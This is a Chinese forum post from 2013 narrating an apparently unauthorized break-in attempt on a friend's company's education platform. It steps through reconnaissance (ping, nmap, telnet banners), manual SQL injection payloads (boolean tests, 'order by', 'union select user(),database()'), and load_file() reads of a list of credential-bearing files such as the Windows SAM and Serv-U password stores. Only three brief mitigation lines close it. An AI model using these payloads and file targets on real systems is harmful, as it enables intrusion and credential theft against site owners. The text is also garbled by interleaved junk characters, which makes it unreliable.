找回密码
 立即注册
查看: 2928|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:! v  m0 e! K9 V9 a4 |
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……* |" x; k1 r$ y. w( ~; r  {
第一步:获取需要的信息% l( B8 u2 d) `3 E# s0 Z& Q9 M# ^
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。4 j0 V$ S6 _3 ~) f0 ]
注:以下为保护特用XXX代替敏感信息+ Q# X2 \/ Y) E+ P5 b. \+ `: d1 w
顺手先PING了一下他们的域名:
# w" S8 M  m. A2 P/ Kping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)) Y2 S6 Z8 _. {. F) M/ `5 Z, F9 W; [
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
* u/ T$ F$ b/ R顺便了解一下TTL,学好基础知识才能一路顺风:
$ {  f, I# k& A8 yTTL:(Time To Live ) 生存时间1 d  i6 h  V! c; H$ ?+ i# U( \
指定数据包被路由器丢弃之前允许通过的网段数量。& o8 R6 {! R' z& f
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。. Q" Y; n1 R" V6 k
使用PING时涉及到的 ICMP 报文类型6 e8 q: A5 p* E# _9 |! E3 j
一个为ICMP请求回显(ICMP Echo Request)
" ^0 b- t- i/ J/ R8 g( u8 D, w! l一个为ICMP回显应答(ICMP Echo Reply)6 w! z3 j3 V0 c3 }! E
TTL 字段值可以帮助我们识别操作系统类型。
2 D' i/ A/ i: v1 \& W  U. c1 _2 rUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
5 o. Z9 v9 t' @6 u3 RCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
5 |* }% b) W8 g+ p4 m6 e+ S( R微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128' H* H- X+ J  a1 Z6 J, B" t; A
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32) w) T0 B8 t. D
当然,返回的TTL值是相同的% B6 ]; A, R# s5 c# X0 c
但有些情况下有所特殊
7 W9 d6 \8 _/ `# H, Y( e: h# CLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64, x% e0 x: m8 n' _; m/ U
FreeBSD 4.1, 4.0, 3.4;: I2 s$ J# H- ?0 F9 K3 ~* S; m
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
; g0 W+ ~- x0 S: n( U" BOpenBSD 2.6, 2.7,
0 F; {3 N- L' s$ {+ z7 F% \, wNetBSD
3 E6 ]( I. I* D2 \HP UX 10.20
+ l- B7 S2 F" T( q' F& kICMP 回显应答的 TTL 字段值为 255
0 i8 B$ w# x+ E6 g( C( v* T+ q4 O3 YWindows 95/98/98SE0 O0 d3 \6 v. y) F
Windows ME
3 }0 T2 j& [; s7 x! J# d, Z, [6 ]ICMP 回显应答的 TTL 字段值为 32+ ?9 w: n9 m5 Z- r( ~+ G& o) f4 I% z
Windows NT4 WRKS$ G. f/ \: d/ d, x5 A2 p: b* c
Windows NT4 Server
6 L' `7 e: I8 M; nWindows 2000! q4 w. S: k9 w( F1 t5 P/ |1 ]4 b1 @
Windows XP" ~8 h% b4 q% C
ICMP 回显应答的 TTL 字段值为 128
' Y+ |1 r8 |, h) z% ^8 I9 d这样,我们就可以通过这种方法来辨别操作系统* O9 e* a* U+ t7 r. s: I0 W
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
8 N2 e# T9 c, A" |5 C1 f4 p用NMAP扫描一下:1 S! k3 \+ l+ C
nmap -sT -O XXX.XXX.XXX.XXX3 z0 E4 a7 v; \7 h
如果没有装WinPcap则会弹出提示:* j7 f0 x% Y5 ^: z, u. P- o: O+ Q/ v
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr# p, m  t/ E* Z8 T1 Q% ]3 ^
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
6 ]) u& I5 D& Z6 x) mode — Nmap may not function completely
8 h7 t5 q4 t6 d8 h; K5 I1 a# ETCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
' D' V" K  d8 X: x. Tand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win$ _3 ?5 H1 H; Q# Z8 I7 O9 O
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
( i. f, U2 x4 _6 ~d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
" s8 A( j' ^, |: ^' i% gersions, you may be able to take iphlpapi.dll from another system and place it i
" X( v" B+ X7 m% f+ a( {+ j* f! p# Mn your system32 dir (e.g. c:\windows\system32).) g8 u, t4 X, K# |/ s, E6 u
QUITTING!
9 N% W3 H, `; Y5 O到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
- g- F% P1 b+ i1 o( R安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:. l) J& g; S- m  G: J6 S7 L; S
Interesting ports on XXX.XXX.XXX.XXX:. d& O: N& K$ p% J! ?
Not shown: 986 closed ports4 G, q" c5 K9 B' d" Q
PORT     STATE    SERVICE
  Y% a0 r' m2 K) ?4 s" M21/tcp   open     ftp5 ~# q5 |5 p5 r! \. Z
22/tcp   open     ssh+ h+ P4 r7 a4 i
23/tcp   open     telnet' _4 Z$ ]# D0 E4 d( M$ v
80/tcp   open     http
  C! }& r; S+ l" P111/tcp  open     rpcbind
  ]: a8 ^# ]/ J135/tcp  filtered msrpc! Z; i" t& T1 K7 F, B8 }% Q# i+ _
139/tcp  filtered netbios-ssn
& O9 _+ M# }- @% D4 x( l) a445/tcp  filtered microsoft-ds4 p7 x, t( \$ ~$ q6 D. S. k
513/tcp  open     login. j7 i3 Q/ @2 v% N$ @3 i: \
514/tcp  open     shell2 R# |. s; g+ U. U2 G/ ~+ t
593/tcp  filtered http-rpc-epmap
2 |8 r* p) [  `  B: u0 Y( A' h: `1720/tcp filtered H.323/Q.931
& x* k/ ]0 |# E9 Y3306/tcp open     mysql
  Y) y& P+ k, J% o2 u% S4444/tcp filtered krb524' N: r& D) ]. @- d6 j. e7 z
Device type: WAP2 @( w0 Z' U9 G. ]
Running: Linux 2.4.X
& s: y/ d+ X6 g4 R$ s2 Q8 VOS details: DD-WRT (Linux 2.4.35s); [0 r4 b) x# ~# {: |' ]. _* ?% j! D
Network Distance: 13 hops6 @6 T" k5 N; g  m* }
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
2 g0 I# C1 J5 Plogin as:
" x# K# O) H: z- OTelnet23端口也是开着的,用telnet 命令链接一下:
+ d* a* l3 {5 J# ^2 \' |telnet XXX.XXX.XXX.XXX: q9 H8 w6 T, _' z7 p
提示:& ~, L4 k- U* H
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
3 l- p# ^0 n# J: V- t! n! sKernel 2.6.18-92.el5PAE on an i6865 V6 [+ W& d- o+ Y2 F$ U0 Q
login:
7 f: S. c( P* Z/ Y' S获取HTTP头信息:
3 A$ ?! t2 B* p- A# H4 g  X4 J在本地执行如下PHP代码
6 @5 Z2 `! x" P- V2 p<?php+ q6 ]" L1 x% c( _
$url = ‘XXX.XXX.XXX.XXX’;
/ D- [2 Q" U0 K" Z1 ^2 L6 oprint_r(get_headers($url));/ l: h3 E- P1 U$ H" ?5 ?! j: R$ `
print_r(get_headers($url, 1));- h1 O3 v' E" p' u" i
?>
) B; T; O9 s7 q将以上代码保存为PHP文件,执行:6 G, {: I7 a2 \
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )$ \, ~! T5 o7 ?* X% V7 Q; u
现在可以得出结论:
! s' o/ h* r  B, V系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)6 D+ v+ ~- J+ {# K# E+ Q6 Q
内核版本:Kernel 2.6.18-92.el5PAE on an i686
; `% Z2 V0 h8 PWEB服务器版本:nginx/0.7.61
0 n6 U: b8 P# `第二步,开始测试寻找漏洞
! N, w6 v- }; J3 ~* R9 [! j分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。8 s* Q; J2 D% T& l7 }
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的7 B% T9 X2 h: o$ F0 U
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试  |4 K: n& A& ]0 w
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
  ]- x$ j9 w! j6 T7 Shttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
" o7 \8 H; X1 u7 M; Y9 E) ]' D5 ]恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续3 h. f0 r! d  G* x
3、手工注入:7 i0 A9 F8 p  N- {0 Z
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
9 S- f, D  g7 R  h1 i3.1 猜测当前表字段数
! i' H4 u6 e3 M* S8 bhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
: B/ c" G& e: z! C' H此处猜测有个简单的算法,都是有技巧的吗,呵呵8 U2 G4 }6 o/ g9 l7 s# s+ G" e! H, R7 E
算法简单如下:
9 W( V5 o, r) D. Z2 u第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;+ @0 h9 t! `' E$ H
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
# W( u2 d# d- r1 n. v需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
7 W6 N3 `6 K# G; `; t以此来判断,是否过界,配合取中算法猜出字段数。
2 F% E, T# y* r( _3 T举例:; I4 G9 G9 M+ J  [9 O( V
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
7 O; N' k8 r  Phttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误2 V5 V# q! z* @4 h) |& m5 A- h
此时3则为我们要找的字段数。
' x$ n2 m& R" ?3.2 配合union联合查询字段在页面所位置
: I6 ~4 S  }) y' i3 }. z2 |我们已经知道了字段数为3,此时则可以做如下操作:
: W% n* F! \% {* e7 Shttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
0 C5 t: X; l8 f0 T% R1 P# b1 c/ y8 r& r0 W& `% B2 p- E0 Q0 Z7 j
这样就可以测试到哪些字段在页面上有所显示了,如图:
; G/ R: m8 {7 m# y/ d1 O5 N; N% M) @' M4 N% f
3.3 查敏感信息
0 {1 r  t/ [) A8 Z这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
# i0 `* w7 ^  F$ @. [$ ]  vhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()+ P' b* [: i6 t# f# y6 ~0 d
3.3.1 先查数据库用户、数据库名,以备后用,如图:
0 Y, ]( r7 f  w* l8 q8 s. R$ S2 J2 y1 H! s$ @0 b: W: N
得到数据库用户为root、数据库名为DBxx;7 t0 o) k0 g7 T( h& ^4 c) Y$ g  x
3.3.2 查配置文件
& Q, d4 D- c9 g4 ~查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
# D7 k) z7 O5 y+ q. x查看文件有一定的条件限制:: H% k8 ]: @- g. }# i7 O# h3 S
欲读取文件必须在服务器上
" y6 I6 k, f! j2 F8 H必须指定文件完整的路径. a5 n% x) o" t) ~4 w
必须有权限读取并且文件必须完全可读
+ x+ K2 T( G" h% s7 \欲读取文件必须小于 max_allowed_packet
' O: P& P4 J* E) @( [" ]- C' @( |MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
: H' D, p6 ]$ }/ f( P常用的一些:
  F5 ]& y. p" j5 p: N$ [" @/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
. E1 J# b0 J4 U, c/ x: _6 R( V/usr/local/apache2/conf/httpd.conf! z. k7 e7 r% ~2 |# d. s
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置1 e/ \8 Z# n# s7 }7 C
/usr/local/app/php5/lib/php.ini //PHP相关设置
. c6 e; i) k+ R6 ]: P/etc/sysconfig/iptables //从中得到防火墙规则策略
  R* O" s- k( d) U/etc/httpd/conf/httpd.conf // apache配置文件% X1 o) U1 V6 j/ ~7 C) W2 C( `  |
/etc/rsyncd.conf //同步程序配置文件
( a& q6 Q  \/ B, J2 a- P8 X/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
9 O, k) ]" y+ ?; ^& b$ ?9 J/etc/my.cnf //mysql的配置文件" M7 e! i" A# p2 C
/etc/redhat-release //系统版本  S" N1 M( d' |+ E2 k: S' N
/etc/issue
  K8 X+ [- z* s3 F/etc/issue.net
+ E* p0 _9 G, u' x" V/ {c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码9 g9 Q0 d4 ?" i
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
! q  U) ]- b) ~c:\Program Files\Serv-U\ServUDaemon.ini
. R- J& b$ q  ]0 G$ T( T% h8 Vc:\windows\my.ini //MYSQL配置文件
2 R' ~# ]* v+ W) C! Z  Z( ]/ c' ?c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件. P7 ~/ r# D8 J( C) T. i+ L
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,7 a; n7 [$ Z4 p' j. O
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码" y- A" C, Y- k' J- u( x, |4 K! ?
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此7 z( }0 n/ [3 f* H! f* D. T
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
4 ~3 e6 x* {, k: jC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
0 @+ G' m% M8 n4 \8 u//存储了pcAnywhere的登陆密码0 m0 L# e: t% k  z. z# O8 f% `5 x1 y
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
* W6 A6 o5 ^3 v这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
2 d: ~8 K" J5 R0 D" r; e最后:防范措施
) C/ z# V" X0 |2 D: N% W+ q1、修复PHP注入漏洞;
/ f2 H' i  c  I2 r" f  z. S2、Mysql使用普通权限的用户;
/ R4 H* X: q, B% H& n3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表